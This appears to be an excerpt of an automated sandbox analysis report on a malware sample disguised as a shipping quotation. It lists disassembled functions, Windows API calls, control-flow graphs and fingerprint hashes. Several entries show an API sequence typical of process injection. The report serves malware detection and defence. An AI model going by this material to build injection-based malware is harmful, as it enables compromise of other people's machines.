                                                                            • API ID: ErrorLast$CloseFileHandle$CreateType
                                                                            • String ID: H
                                                                            • API String ID: 3086256261-2852464175
                                                                            • Opcode ID: 64251a19f568036642363132c7f1f932db0b1d85afb2526b7c8bb197c4acb475
                                                                            • Instruction ID: 6cf462e6730db1696a19f7e69e935a4280c2f4caca3107ffe2b420e655081849
                                                                            • Opcode Fuzzy Hash: 64251a19f568036642363132c7f1f932db0b1d85afb2526b7c8bb197c4acb475
                                                                            • Instruction Fuzzy Hash: 5BA15532A00144CFEF19EF68D851BAE3BA2AB06324F14815DF819DB391CB309D13CBA5
                                                                            Function 0106C100 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 510 106c100-106c1ae call 1069b30 513 106c1b5-106c1db call 106d010 CreateFileW 510->513 516 106c1e2-106c1f2 513->516 517 106c1dd 513->517 522 106c1f4 516->522 523 106c1f9-106c213 VirtualAlloc 516->523 518 106c32d-106c331 517->518 520 106c373-106c376 518->520 521 106c333-106c337 518->521 524 106c379-106c380 520->524 525 106c343-106c347 521->525 526 106c339-106c33c 521->526 522->518 529 106c215 523->529 530 106c21a-106c231 ReadFile 523->530 531 106c3d5-106c3ea 524->531 532 106c382-106c38d 524->532 527 106c357-106c35b 525->527 528 106c349-106c353 525->528 526->525 535 106c35d-106c367 527->535 536 106c36b 527->536 528->527 529->518 537 106c233 530->537 538 106c238-106c278 VirtualAlloc 530->538 533 106c3ec-106c3f7 VirtualFree 531->533 534 106c3fa-106c402 531->534 539 106c391-106c39d 532->539 540 106c38f 532->540 533->534 535->536 536->520 537->518 541 106c27f-106c29a call 106d260 538->541 542 106c27a 538->542 543 106c3b1-106c3bd 539->543 544 106c39f-106c3af 539->544 540->531 550 106c2a5-106c2af 541->550 542->518 547 106c3bf-106c3c8 543->547 548 106c3ca-106c3d0 543->548 546 106c3d3 544->546 546->524 547->546 548->546 551 106c2e2-106c2f6 call 106d070 550->551 552 106c2b1-106c2e0 call 106d260 550->552 558 106c2fa-106c2fe 551->558 559 106c2f8 551->559 552->550 560 106c300-106c304 CloseHandle 558->560 561 106c30a-106c30e 558->561 559->518 560->561 562 106c310-106c31b VirtualFree 561->562 563 106c31e-106c327 561->563 562->563 563->513 563->518
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0106C1D1
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0106C3F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileFreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 204039940-0
                                                                            • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                            • Instruction ID: 1a522708efe742e8c8f4d461deba1c57ab520a7b3593163d81583d5078f48b7b
                                                                            • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                            • Instruction Fuzzy Hash: BBA10A70E00219EBEB14CFE4C994BEEBBB9FF48304F208199E595BB280D7759A41CB54
                                                                            Function 00632C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 781 632c63-632cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00632C91
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00632CB2
                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00631CAD,?), ref: 00632CC6
                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00631CAD,?), ref: 00632CCF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: 4873159ea496f70de9ef52ce7c26476a900b7cc92169ea7641d43232f6b62bb8
                                                                            • Instruction ID: 3aae6abc2185fe1c4e8f7ff02a0f5b2e019e29dbc4f9494093786e5fb2234d88
                                                                            • Opcode Fuzzy Hash: 4873159ea496f70de9ef52ce7c26476a900b7cc92169ea7641d43232f6b62bb8
                                                                            • Instruction Fuzzy Hash: 0CF03A75940390BAEB301B13AC1CE77AEBED7C6F60B40911EF904A25A0CA790840DAB8
                                                                            Function 0106BEE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1406 106bee0-106bff8 call 1069b30 call 106bdd0 CreateFileW 1413 106bfff-106c00f 1406->1413 1414 106bffa 1406->1414 1417 106c016-106c030 VirtualAlloc 1413->1417 1418 106c011 1413->1418 1415 106c0af-106c0b4 1414->1415 1419 106c034-106c04b ReadFile 1417->1419 1420 106c032 1417->1420 1418->1415 1421 106c04f-106c089 call 106be10 call 106add0 1419->1421 1422 106c04d 1419->1422 1420->1415 1427 106c0a5-106c0ad ExitProcess 1421->1427 1428 106c08b-106c0a0 call 106be60 1421->1428 1422->1415 1427->1415 1428->1427
                                                                            APIs
                                                                              • Part of subcall function 0106BDD0: Sleep.KERNELBASE(000001F4), ref: 0106BDE1
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0106BFEE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileSleep
                                                                            • String ID: Y19YV6C6WGSBFMB010
                                                                            • API String ID: 2694422964-4211810753
                                                                            • Opcode ID: bc985148a7938dfab6a7a995fb8e4606f88cd43cf74661d12d51f3c5e4919924
                                                                            • Instruction ID: 02dee5578fd98b61740b3d1367c8d47068f8fb48cad1444809e7737d5c5a67a3
                                                                            • Opcode Fuzzy Hash: bc985148a7938dfab6a7a995fb8e4606f88cd43cf74661d12d51f3c5e4919924
                                                                            • Instruction Fuzzy Hash: C7517171D04249EBFF11DBE4C814BEEBBB9AF15300F004199E249BB2C1D6B91B49CBA5
                                                                            Function 00633B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1740 633b1c-633b27 1741 633b99-633b9b 1740->1741 1742 633b29-633b2e 1740->1742 1744 633b8c-633b8f 1741->1744 1742->1741 1743 633b30-633b48 RegOpenKeyExW 1742->1743 1743->1741 1745 633b4a-633b69 RegQueryValueExW 1743->1745 1746 633b80-633b8b RegCloseKey 1745->1746 1747 633b6b-633b76 1745->1747 1746->1744 1748 633b90-633b97 1747->1748 1749 633b78-633b7a 1747->1749 1750 633b7e 1748->1750 1749->1750 1750->1746
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00633B0F,SwapMouseButtons,00000004,?), ref: 00633B40
                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00633B0F,SwapMouseButtons,00000004,?), ref: 00633B61
                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00633B0F,SwapMouseButtons,00000004,?), ref: 00633B83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 3677997916-824357125
                                                                            • Opcode ID: ed9499d13aa9cdd7b16588dba44700fa309328884904853365b09bc7e09f004c
                                                                            • Instruction ID: c7542f1ada71727af1285d1857667be3a8bf1a983cc30c521085867174dd2dcc
                                                                            • Opcode Fuzzy Hash: ed9499d13aa9cdd7b16588dba44700fa309328884904853365b09bc7e09f004c
                                                                            • Instruction Fuzzy Hash: BF112AB5610218FFDB208FA5DC44EEEB7B9EF24754F104459E806D7210D2319E4197A0
                                                                            Function 0106ADD0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1751 106add0-106ae70 call 106d240 * 3 1758 106ae87 1751->1758 1759 106ae72-106ae7c 1751->1759 1761 106ae8e-106ae97 1758->1761 1759->1758 1760 106ae7e-106ae85 1759->1760 1760->1761 1762 106ae9e-106b550 1761->1762 1763 106b552-106b556 1762->1763 1764 106b563-106b590 CreateProcessW 1762->1764 1765 106b59c-106b5c9 1763->1765 1766 106b558-106b55c 1763->1766 1771 106b592-106b595 1764->1771 1772 106b59a 1764->1772 1782 106b5d3 1765->1782 1783 106b5cb-106b5ce 1765->1783 1767 106b5d5-106b602 1766->1767 1768 106b55e 1766->1768 1770 106b60c-106b626 Wow64GetThreadContext 1767->1770 1790 106b604-106b607 1767->1790 1768->1770 1775 106b62d-106b648 ReadProcessMemory 1770->1775 1776 106b628 1770->1776 1777 106b991-106b993 1771->1777 1772->1770 1780 106b64f-106b658 1775->1780 1781 106b64a 1775->1781 1779 106b93a-106b93e 1776->1779 1785 106b940-106b944 1779->1785 1786 106b98f 1779->1786 1787 106b681-106b6a0 call 106c8c0 1780->1787 1788 106b65a-106b669 1780->1788 1781->1779 1782->1770 1783->1777 1791 106b946-106b952 1785->1791 1792 106b959-106b95d 1785->1792 1786->1777 1801 106b6a7-106b6ca call 106ca00 1787->1801 1802 106b6a2 1787->1802 1788->1787 1793 106b66b-106b67a call 106c810 1788->1793 1790->1770 1790->1777 1791->1792 1794 106b95f-106b962 1792->1794 1795 106b969-106b96d 1792->1795 1793->1787 1804 106b67c 1793->1804 1794->1795 1799 106b96f-106b972 1795->1799 1800 106b979-106b97d 1795->1800 1799->1800 1805 106b97f-106b985 call 106c810 1800->1805 1806 106b98a-106b98d 1800->1806 1810 106b714-106b735 call 106ca00 1801->1810 1811 106b6cc-106b6d3 1801->1811 1802->1779 1804->1779 1805->1806 1806->1777 1817 106b737 1810->1817 1818 106b73c-106b75a call 106d260 1810->1818 1813 106b6d5-106b706 call 106ca00 1811->1813 1814 106b70f 1811->1814 1821 106b70d 1813->1821 1822 106b708 1813->1822 1814->1779 1817->1779 1824 106b765-106b76f 1818->1824 1821->1810 1822->1779 1825 106b7a5-106b7a9 1824->1825 1826 106b771-106b7a3 call 106d260 1824->1826 1828 106b894-106b8b1 call 106c410 1825->1828 1829 106b7af-106b7bf 1825->1829 1826->1824 1837 106b8b3 1828->1837 1838 106b8b8-106b8d7 Wow64SetThreadContext 1828->1838 1829->1828 1832 106b7c5-106b7d5 1829->1832 1832->1828 1835 106b7db-106b7ff 1832->1835 1836 106b802-106b806 1835->1836 1836->1828 1839 106b80c-106b821 1836->1839 1837->1779 1840 106b8db-106b8e6 call 106c740 1838->1840 1841 106b8d9 1838->1841 1842 106b835-106b839 1839->1842 1847 106b8ea-106b8ee 1840->1847 1848 106b8e8 1840->1848 1841->1779 1845 106b877-106b88f 1842->1845 1846 106b83b-106b847 1842->1846 1845->1836 1849 106b875 1846->1849 1850 106b849-106b873 1846->1850 1851 106b8f0-106b8f3 1847->1851 1852 106b8fa-106b8fe 1847->1852 1848->1779 1849->1842 1850->1849 1851->1852 1854 106b900-106b903 1852->1854 1855 106b90a-106b90e 1852->1855 1854->1855 1856 106b910-106b913 1855->1856 1857 106b91a-106b91e 1855->1857 1856->1857 1858 106b920-106b926 call 106c810 1857->1858 1859 106b92b-106b934 1857->1859 1858->1859 1859->1762 1859->1779
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0106B58B
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0106B621
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0106B643
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                            • Instruction ID: 02e751bb8923966af6d8c146b3d8483278afd840f51e742dadae6c557a2f1ced
                                                                            • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                            • Instruction Fuzzy Hash: F5621B70A14258DBEB24DFA4C850BDEB376EF58300F1091A9D24DEB390E7799E81CB59
                                                                            Function 00633923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1861 633923-633939 1862 633a13-633a17 1861->1862 1863 63393f-633954 call 636270 1861->1863 1866 673393-6733a2 LoadStringW 1863->1866 1867 63395a-633976 call 636b57 1863->1867 1869 6733ad-6733b6 1866->1869 1873 6733c9-6733e5 call 636350 call 633fcf 1867->1873 1874 63397c-633980 1867->1874 1871 633994-633a0e call 652340 call 633a18 call 654983 Shell_NotifyIconW call 63988f 1869->1871 1872 6733bc-6733c4 call 63a8c7 1869->1872 1871->1862 1872->1871 1873->1871 1887 6733eb-673409 call 6333c6 call 633fcf call 6333c6 1873->1887 1874->1869 1876 633986-63398f call 636350 1874->1876 1876->1871 1887->1871
                                                                            APIs
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00633A04
                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006733A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String
                                                                            • String ID: Line:
                                                                            • API String ID: 3363329723-1585850449
                                                                            • Opcode ID: 0d52c2a456a49b169796e2956bff136031ebc51bc6d47494c5708f6cc5ccf462
                                                                            • Instruction ID: 4897f25b6f1a29ac898f4ec0908ea1dec970d69d84e1f6f588d79f4332631360
                                                                            • Opcode Fuzzy Hash: 0d52c2a456a49b169796e2956bff136031ebc51bc6d47494c5708f6cc5ccf462
                                                                            • Instruction Fuzzy Hash: 2531D471808320EED765EB20DC45BEBB7DAAB40710F00862EF599832D1EF749649C7CA
                                                                            Function 00632DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00672C8C
                                                                              • Part of subcall function 00633AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00633A97,?,?,00632E7F,?,?,?,00000000), ref: 00633AC2
                                                                              • Part of subcall function 00632DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00632DC4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                            • String ID: X$`eo
                                                                            • API String ID: 779396738-1816224629
                                                                            • Opcode ID: ef662feaf277e6b4437925c2780ba8c7209f222ede4c9e42dbc5e54cafce2417
                                                                            • Instruction ID: c07b7c3189f7ec65cb270d68e22fd0a069d24e1b1ed5b76008203bbe456979b4
                                                                            • Opcode Fuzzy Hash: ef662feaf277e6b4437925c2780ba8c7209f222ede4c9e42dbc5e54cafce2417
                                                                            • Instruction Fuzzy Hash: 7E219671A002589BCB41EF94C855BEE7BFAAF49314F008059E505A7341DBB455498FA5
                                                                            Function 006B7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 006B82F5
                                                                            • TerminateProcess.KERNEL32(00000000), ref: 006B82FC
                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 006B84DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                            • String ID:
                                                                            • API String ID: 146820519-0
                                                                            • Opcode ID: 8d2e3b45a8b62d675ac6fe5317dea0b00537ab30f0bfdbdf3ccac49fda8be169
                                                                            • Instruction ID: 7163a2fdb8ecdf988dbee821647dcfe16cb5ce54c975334d87f3d252adf6e4c2
                                                                            • Opcode Fuzzy Hash: 8d2e3b45a8b62d675ac6fe5317dea0b00537ab30f0bfdbdf3ccac49fda8be169
                                                                            • Instruction Fuzzy Hash: 39125BB19083419FC754DF28C484BAABBE6BF85314F04895DE8898B352DB31ED85CF92
                                                                            Function 006310F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00631BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00631BF4
                                                                              • Part of subcall function 00631BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00631BFC
                                                                              • Part of subcall function 00631BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00631C07
                                                                              • Part of subcall function 00631BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00631C12
                                                                              • Part of subcall function 00631BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00631C1A
                                                                              • Part of subcall function 00631BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00631C22
                                                                              • Part of subcall function 00631B4A: RegisterWindowMessageW.USER32(00000004,?,006312C4), ref: 00631BA2
                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0063136A
                                                                            • OleInitialize.OLE32 ref: 00631388
                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 006724AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                            • String ID:
                                                                            • API String ID: 1986988660-0
                                                                            • Opcode ID: 6b3733d36bd56ce8e45bb8b834655e8887315cdcd5942ba636ab27792eb44a8e
                                                                            • Instruction ID: 00229b1b2c6ef596e3f185f9bedf5af9d5d0b99d79192b3f2dbed2e83e0ab5ae
                                                                            • Opcode Fuzzy Hash: 6b3733d36bd56ce8e45bb8b834655e8887315cdcd5942ba636ab27792eb44a8e
                                                                            • Instruction Fuzzy Hash: 577199B4911240CEC384DF79AC55A653AE2EB893647D4C32EE04ADB3B1EF384561CF99
                                                                            Function 00633837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00633908
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_
                                                                            • String ID:
                                                                            • API String ID: 1144537725-0
                                                                            • Opcode ID: 732dab63dabf28b4c41f6bbcd215f9c83ab556144ac4d582bdb752ea214e2a33
                                                                            • Instruction ID: 285aba2f4573a6f237e2c84740ea943a74c410c7148b3091e4290e953e9c8ea1
                                                                            • Opcode Fuzzy Hash: 732dab63dabf28b4c41f6bbcd215f9c83ab556144ac4d582bdb752ea214e2a33
                                                                            • Instruction Fuzzy Hash: 05317C70604311DFD760DF24D884797BBE9FB49719F00492EF59983380EB75AA44CB96
                                                                            Function 00635745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0063949C,?,00008000), ref: 00635773
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0063949C,?,00008000), ref: 00674052
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: e9faa8fd287c34bf42df188fc77261c5c74fd10b3e8e980fbe36c3dcd4e2d72e
                                                                            • Instruction ID: 57f548e95c5a7e88933d8f45048afbc88c94fca7ce5afc7cc005c1583525e726
                                                                            • Opcode Fuzzy Hash: e9faa8fd287c34bf42df188fc77261c5c74fd10b3e8e980fbe36c3dcd4e2d72e
                                                                            • Instruction Fuzzy Hash: 1D014031145225B6E7314A2ADC0EFA77F99EF027B0F148214BA9D5B1E1CBB45855CBD0
                                                                            Function 006629C8 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,0066D7D1,00000000,00000000,00000000,00000000,?,0066D7F8,00000000,00000007,00000000,?,0066DBF5,00000000), ref: 006629DE
                                                                            • GetLastError.KERNEL32(00000000,?,0066D7D1,00000000,00000000,00000000,00000000,?,0066D7F8,00000000,00000007,00000000,?,0066DBF5,00000000,00000000), ref: 006629F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 485612231-0
                                                                            • Opcode ID: c806b49d9ea008bcd8fa18921850068343770b4063e6c959f431950d6f4deb32
                                                                            • Instruction ID: 8739f4c391d052fe7b3f840501d3622d23dc94fd0a26d538290475888f61bc79
